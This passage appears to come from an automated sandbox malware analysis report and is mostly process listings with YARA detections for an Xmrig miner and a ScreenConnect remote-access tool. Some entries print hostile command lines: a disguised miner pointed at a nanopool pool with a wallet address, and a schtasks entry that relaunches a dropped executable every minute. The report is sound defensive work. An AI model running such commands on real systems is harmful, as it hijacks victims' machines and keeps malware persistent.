                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F3898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2778573331.00000159F3495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782967013.00000159F3470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F38C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2771554480.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2770178263.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2760641243.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2765139328.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764927688.00000159F3472000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F3897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F38CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2777007339.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764697915.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2766881524.00000159F346E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2766881524.00000159F3479000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782280474.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2787221813.00000159F345E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2784484927.00000159F3484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2790709240.00000159F361A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2791398929.00000159F3460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2781349798.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2801216518.00000159F349D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                                                                                                                                                                                          Imagebase:0x23d0a940000
                                                                                                                                                                                          File size:42'800 bytes
                                                                                                                                                                                          MD5 hash:929EA1AF28AFEA2A3311FD4297425C94
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                                                                                                                                                                                          Imagebase:0x1b496ad0000
                                                                                                                                                                                          File size:42'800 bytes
                                                                                                                                                                                          MD5 hash:929EA1AF28AFEA2A3311FD4297425C94
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"
                                                                                                                                                                                          Imagebase:0x670000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                          Start time:03:27:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                                                                                                                                                                                          Imagebase:0x7ff6712e0000
                                                                                                                                                                                          File size:1'180'160 bytes
                                                                                                                                                                                          MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2922120647.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E49827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E497F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2919365464.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2916180807.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2965569347.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2931991322.0000020E495E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2916180807.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2924968847.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2919365464.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2968135446.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2923367726.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2968964641.0000020E495E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2929542126.0000020E495E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2971778971.0000020E495F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2971339077.0000020E495EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E4982A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2970680561.0000020E4949C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2969262618.0000020E49491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2931335674.0000020E495E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E497F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2920893388.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                          Start time:03:27:42
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"
                                                                                                                                                                                          Imagebase:0x180000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                          Start time:03:27:48
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                                                                                                                                                                                          Imagebase:0x7ff6712e0000
                                                                                                                                                                                          File size:1'180'160 bytes
                                                                                                                                                                                          MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                          Start time:03:27:52
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"
                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                          Start time:03:28:01
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"
                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                          Start time:03:28:12
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"
                                                                                                                                                                                          Imagebase:0xe70000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                          Start time:03:28:24
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"
                                                                                                                                                                                          Imagebase:0x630000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                          Start time:03:28:38
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                                                                                                                                                                                          Imagebase:0x950000
                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                          Start time:03:28:38
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                          Start time:03:28:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                          Start time:03:28:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                          Start time:03:28:52
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                          Start time:03:29:00
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:4.8%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:47.1%
                                                                                                                                                                                            Total number of Nodes:884
                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                            execution_graph 24311 5f0d57 26 API calls 24363 5f6254 64 API calls 2 library calls 24364 5f7e51 25 API calls 2 library calls 24261 5d104d 46 API calls 24262 60ac72 71 API calls 4 library calls 24313 5ef94b 9 API calls 3 library calls 24314 5d3d40 66 API calls 24317 5fa141 GetCommandLineA GetCommandLineW 24264 5fbc7f 7 API calls ___scrt_uninitialize_crt 24265 5fd47c 26 API calls std::_Locinfo::_Locinfo_dtor 24409 5edb20 157 API calls 2 library calls 24410 5eff72 44 API calls 4 library calls 24267 60c054 47 API calls 24268 607854 42 API calls 3 library calls 23881 5f0d69 23882 5f0d75 __FrameHandler3::FrameUnwindToState 23881->23882 23906 5f0f6b 23882->23906 23884 5f0d7c 23885 5f0ed5 23884->23885 23894 5f0da6 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 23884->23894 23922 5f1434 4 API calls 2 library calls 23885->23922 23887 5f0edc 23888 5f66fe 23 API calls 23887->23888 23889 5f0ee2 23888->23889 23923 5f66c2 23 API calls __InternalCxxFrameHandler 23889->23923 23891 5f0eea 23892 5f0dc5 23893 5f0e46 23914 5f9f7c 23893->23914 23894->23892 23894->23893 23918 5f66d8 37 API calls 3 library calls 23894->23918 23897 5f0e4c 23898 5f0e63 23897->23898 23919 5f1554 GetModuleHandleW 23898->23919 23900 5f0e6d 23900->23887 23901 5f0e71 23900->23901 23902 5f0e7a 23901->23902 23920 5f66b3 23 API calls __InternalCxxFrameHandler 23901->23920 23921 5f10dc 73 API calls ___scrt_uninitialize_crt 23902->23921 23905 5f0e83 23905->23892 23907 5f0f74 23906->23907 23924 5f0ad3 IsProcessorFeaturePresent 23907->23924 23909 5f0f80 23925 5f38be 10 API calls 2 library calls 23909->23925 23911 5f0f85 23912 5f0f89 23911->23912 23926 5f38dd 7 API calls 2 library calls 23911->23926 23912->23884 23915 5f9f8a 23914->23915 23916 5f9f85 23914->23916 23915->23897 23927 5f9ce0 49 API calls 23916->23927 23918->23893 23919->23900 23920->23902 23921->23905 23922->23887 23923->23891 23924->23909 23925->23911 23926->23912 23927->23915 24321 5fd969 30 API calls 2 library calls 24415 5e3b60 68 API calls 2 library calls 24417 5f3760 6 API calls 4 library calls 24323 605522 45 API calls 4 library calls 24270 5ff019 64 API calls 2 library calls 24271 5d101b 28 API calls 23928 602727 23933 6024fd 23928->23933 23931 602766 23934 60251c 23933->23934 23935 60252f 23934->23935 23943 602544 23934->23943 23953 5f8b26 14 API calls __dosmaperr 23935->23953 23937 602534 23954 5f4e3f 25 API calls __Getctype 23937->23954 23939 60253f 23939->23931 23950 60ad8f 23939->23950 23941 602715 23959 